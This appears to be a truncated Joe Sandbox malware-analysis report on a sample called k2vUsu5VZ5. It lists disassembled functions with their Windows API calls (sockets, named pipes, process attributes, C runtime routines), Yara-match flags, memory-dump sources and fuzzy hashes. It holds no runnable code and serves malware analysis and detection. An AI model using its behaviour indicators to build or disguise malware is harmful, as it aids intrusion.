                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction ID: 02b466235ddab890981aad854e79defe62ca439d24bd675fbe73c7b8b2df6166
                • Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction Fuzzy Hash: E11136B180DB0C1F4768FEDD944263BB7C0FB95250F1D022FE8DACB202E950D84686EA
                Function 0349D473 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _IsNonwritableInCurrentImage.LIBCMT ref: 0349D490
                  • Part of subcall function 034A1847: _FindPESection.LIBCMT ref: 034A1870
                • _initp_misc_cfltcvt_tab.LIBCMT ref: 0349D4A1
                • _initterm_e.LIBCMT ref: 0349D4B4
                • _IsNonwritableInCurrentImage.LIBCMT ref: 0349D4FD
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                • String ID:
                • API String ID: 1991439119-0
                • Opcode ID: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
                • Instruction ID: 760afcab25f38854b591a359171109993979391d90a90c9ab04e717d4d9e62b0
                • Opcode Fuzzy Hash: d0aacdeab6c747e7db722564a7347f1053155731eb9de77eec07b84fb13a130c
                • Instruction Fuzzy Hash: BB118234614E08CEFB16FB69ECD86A6B768F755214F48452B8443CE160EE78AA44C748
                Function 038810D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: clock
                • String ID:
                • API String ID: 3195780754-0
                • Opcode ID: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction ID: a370d01c3d165741c150c2f46fa3e2bbd1f3ca2cede3f645463c3680dd1eaad1
                • Opcode Fuzzy Hash: be8aec6b4dea647665e05a79d7238111acf2a2e9d648eaac77e3af4f201da4c7
                • Instruction Fuzzy Hash: 7C11082A604B4545A7B1FFEA688052BF6A0F7847D4F1D21A5EE55D7704EE74C483C601
                Function 038AD498 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 038AD4BC
                  • Part of subcall function 0389F454: _getptd.LIBCMT ref: 0389F46A
                  • Part of subcall function 0389F454: __updatetlocinfo.LIBCMT ref: 0389F49F
                  • Part of subcall function 0389F454: __updatetmbcinfo.LIBCMT ref: 0389F4C6
                • _errno.LIBCMT ref: 038AD4C8
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _invalid_parameter_noinfo.LIBCMT ref: 038AD4D3
                • strchr.LIBCMT ref: 038AD4E9
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                • String ID:
                • API String ID: 4151157258-0
                • Opcode ID: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
                • Instruction ID: ce5ff2916be5d483430b44f3af1730f821983d8d0541a47d9ab50106aebbbde4
                • Opcode Fuzzy Hash: 9dcbabed976c9cb14c0e816df6bc5d9f8365d97b9e504a800266228e51b7a280
                • Instruction Fuzzy Hash: D211E963609BE481FB14DA9DE07013DE690F384FDC74C51A6DB96CFE44D968C14ACB11
                Function 0389CEE0 Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON
                Download Yara Rule
                APIs
                • accept.WS2_32 ref: 0389CEF5
                • send.WS2_32 ref: 0389CF33
                • send.WS2_32 ref: 0389CF47
                • closesocket.WS2_32 ref: 0389CF58
                  • Part of subcall function 0389D01C: closesocket.WS2_32 ref: 0389D028
                  • Part of subcall function 0389D01C: free.LIBCMT ref: 0389D032
                  • Part of subcall function 0389D01C: free.LIBCMT ref: 0389D03B
                  • Part of subcall function 0389D01C: free.LIBCMT ref: 0389D044
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$closesocketsend$accept
                • String ID:
                • API String ID: 47150829-0
                • Opcode ID: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
                • Instruction ID: 9af7e82a6ade31dba51d788f1066db612d7968cd1c577f90e63863f3ff10f027
                • Opcode Fuzzy Hash: 066e2fc8adee108644c0c95b9f8e143474d501460abce45f6e5e6b60318d2000
                • Instruction Fuzzy Hash: 5601216531474182EF64DF76E59173E6321E78DFF4F08A252DE664BB48CF29C0819741
                Function 03893B3C Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
                • Instruction ID: 4804125d1027751dd4164832533f9a32b6e8bed1c1a3c452522b1ec4983bbc52
                • Opcode Fuzzy Hash: 0d8f67eb847476cbf5cd18602dcd1106d203af1aa70024b801e6f9b985edf0b0
                • Instruction Fuzzy Hash: 47F08C26614A5182FB11CB65F84430BE3A9E788B89F6C8165EA8D82A64DF78C5968B04
                Function 038931F8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$NamedPeekPipeSleep
                • String ID:
                • API String ID: 1593283408-0
                • Opcode ID: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
                • Instruction ID: 685ef8509b8d6839d94f1f47388d40f5630860486158c1ce738227b0ec4a9139
                • Opcode Fuzzy Hash: 6eb8226b971c676c39cd0dac2a4860ce413c34c9835dff083589f7d44e328186
                • Instruction Fuzzy Hash: D7F0D136614B5183F7118BA4F44430BF374F7C8B85F288160EB8886A68DF78C5858B04
                Function 03895D78 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • InitializeProcThreadAttributeList.KERNEL32 ref: 03895D96
                • GetProcessHeap.KERNEL32 ref: 03895D9C
                • HeapAlloc.KERNEL32 ref: 03895DAC
                • InitializeProcThreadAttributeList.KERNEL32 ref: 03895DC7
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: AttributeHeapInitializeListProcThread$AllocProcess
                • String ID:
                • API String ID: 1212816094-0
                • Opcode ID: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
                • Instruction ID: cef21bfbe5308cebae7711e15ecd00e606bdfbd87e05ab3841b1036397a88d74
                • Opcode Fuzzy Hash: 22c9adbd14fdaacc8fb1e282febc10ff812bb060a347c24def4cc05294e67cba
                • Instruction Fuzzy Hash: 34F0966272478982EB9ACB65B45475BA295EB89B80F6C9476BE4B82B18DF3CC144C700
                Function 0389D01C Relevance: 6.0, APIs: 4, Instructions: 15COMMON
                Download Yara Rule
                APIs
                • closesocket.WS2_32 ref: 0389D028
                • free.LIBCMT ref: 0389D032
                  • Part of subcall function 0389D188: HeapFree.KERNEL32 ref: 0389D19E
                  • Part of subcall function 0389D188: _errno.LIBCMT ref: 0389D1A8
                  • Part of subcall function 0389D188: GetLastError.KERNEL32 ref: 0389D1B0
                • free.LIBCMT ref: 0389D03B
                • free.LIBCMT ref: 0389D044
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$ErrorFreeHeapLast_errnoclosesocket
                • String ID:
                • API String ID: 1525665891-0
                • Opcode ID: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
                • Instruction ID: c7ac6507ee1476634b152136f24b9b041b5814cb78198a05ab89e3d010d10ac5
                • Opcode Fuzzy Hash: f0a14ae54f92ead1c4b4b34f15b7183d60d2bbec5c8dcb145cd9b656117da10e
                • Instruction Fuzzy Hash: BBD06757A1060591EF14EBB6E8A113C9320E799F98B5880638E5E9B264CE24C89A8385
                Function 00401FD0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON
                Download Yara Rule
                Strings
                • Unknown pseudo relocation bit size %d., xrefs: 00402294
                • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID:
                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                • API String ID: 0-395989641
                • Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                • Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
                • Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                • Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08
                Function 0349976F Relevance: 5.4, APIs: 4, Instructions: 378COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc$_errno_getptdfree
                • String ID:
                • API String ID: 3172138858-0
                • Opcode ID: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                • Instruction ID: 65c2cc2734a0f1e1ab932c97296fdd95bf2e4b2d1af03b673d3a90e4cb7e88f2
                • Opcode Fuzzy Hash: 4061ae52bcfc7ad85d2a69f0cdb15219ba76c7abfce3d0773e5d20170cf697d4
                • Instruction Fuzzy Hash: 03B1E630625F488FFB1AEF28EC916767BE9F749310B44426FD456CB260EB789442CB85
                Function 00401DC0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                Download Yara Rule
                APIs
                Strings
                • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                • API String ID: 1804819252-157664173
                • Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                • Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
                • Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                • Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788
                Function 0349CBE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0349CC38
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • _invalid_parameter_noinfo.LIBCMT ref: 0349CC43
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                • Instruction ID: 21cdd0647b6d0726a0b76ae778cebbfbe67972d8707e1c22cb624d70310c8c3e
                • Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                • Instruction Fuzzy Hash: 46118F30618B088FEB54EF5D9485766BBE1FB98325F1447AFA059CB2A0CB74C845C786
                Function 0389D7A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _errno.LIBCMT ref: 0389D7F1
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • _invalid_parameter_noinfo.LIBCMT ref: 0389D7FC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID: B
                • API String ID: 1812809483-1255198513
                • Opcode ID: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                • Instruction ID: b66aa9a37011bf408bd80bc1dee2518d5af7092bae47444eb5df647838a554ec
                • Opcode Fuzzy Hash: 2c72a65e8919c74c162f480cc61078f9dda1c8fd597633d86c76d95db5f8aa2c
                • Instruction Fuzzy Hash: 0F01D6B2720B4486EB10DF56D440399B665F798FE4F588362AF585BB94CF3CC244CB04
                Function 00401C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Unknown error, xrefs: 00401D2C
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-3474627141
                • Opcode ID: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
                • Instruction ID: 8762e6e2ae6541d4c7c6524eaf70c560080aac858bcbb5099d5ba83032827fc6
                • Opcode Fuzzy Hash: d6c75893a8b8cdba1cdccd7648c7c79805f69453ca37c984926281bf3413687d
                • Instruction Fuzzy Hash: 1E016163D18F88C2D6018F18E8003AB7331FB6E749F259316EB8C3A565DB79D592C704
                Function 00401D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • Overflow range error (OVERFLOW), xrefs: 00401D00
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4064033741
                • Opcode ID: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                • Instruction ID: c612fb770c622c5d72669c3638e63aa4b2f428d8e56e9d424d6433c91b575293
                • Opcode Fuzzy Hash: 2da7071e0933fc8cd59be707335068b51f9eec2d662f944c6a91e8b8bb5ba5d0
                • Instruction Fuzzy Hash: 6FF01D62958E8882D2029F1DE4003AB7331FB9EB99F68531AEF8D3A555DB29D5828704
                Function 00401D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2187435201
                • Opcode ID: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                • Instruction ID: abe9318e7ccd880ee09ac2f980ce11207d3172f5f88a25f0641f3127fee3ffee
                • Opcode Fuzzy Hash: 20ed77b3cd1f5ce30684c910d9c1ef4ed1bc2c10df881c0e026ae3cc509b1426
                • Instruction Fuzzy Hash: 77F06D62858E8882D2029F1DE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                Function 00401D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                • Total loss of significance (TLOSS), xrefs: 00401D20
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4273532761
                • Opcode ID: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                • Instruction ID: 7a53e470b351231260d633d6082b1e766a8645853782131be27a1b39d9499402
                • Opcode Fuzzy Hash: 2868899dc0ce06e4a194e0e488d1f1fc1f92f94880d84b2dd2216e23dea375c1
                • Instruction Fuzzy Hash: 52F01262958E8882D2029F1DE4003AB7331FB9E799F245316EF8D3A555DB39D5828704
                Function 00401CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • Argument domain error (DOMAIN), xrefs: 00401CE0
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-2713391170
                • Opcode ID: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                • Instruction ID: 8c7bf1553abe8d1c1cf5b10b417118f64097995adaaa4f0d994d3f7e231e07fb
                • Opcode Fuzzy Hash: 1d2f049123975630175d9b48e20279646fed079e7b419bc05d7036498ca68734
                • Instruction Fuzzy Hash: ECF06D62858E8882D2029F1CE4003AB7331FB9EB88F28531AEF8D3A155DB28D5828704
                Function 00401CF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON
                Download Yara Rule
                APIs
                Strings
                • Partial loss of significance (PLOSS), xrefs: 00401CF0
                • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: fprintf
                • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                • API String ID: 383729395-4283191376
                • Opcode ID: 7751c0dc0e5f4d0d5a77e2b05341f0464b5ada29b978619af56a2b80f2ae8e47
                • Instruction ID: 5cd091db9141fe0e6e89e9efff11c316d26cc63b3b889972c32c6c159b948a40
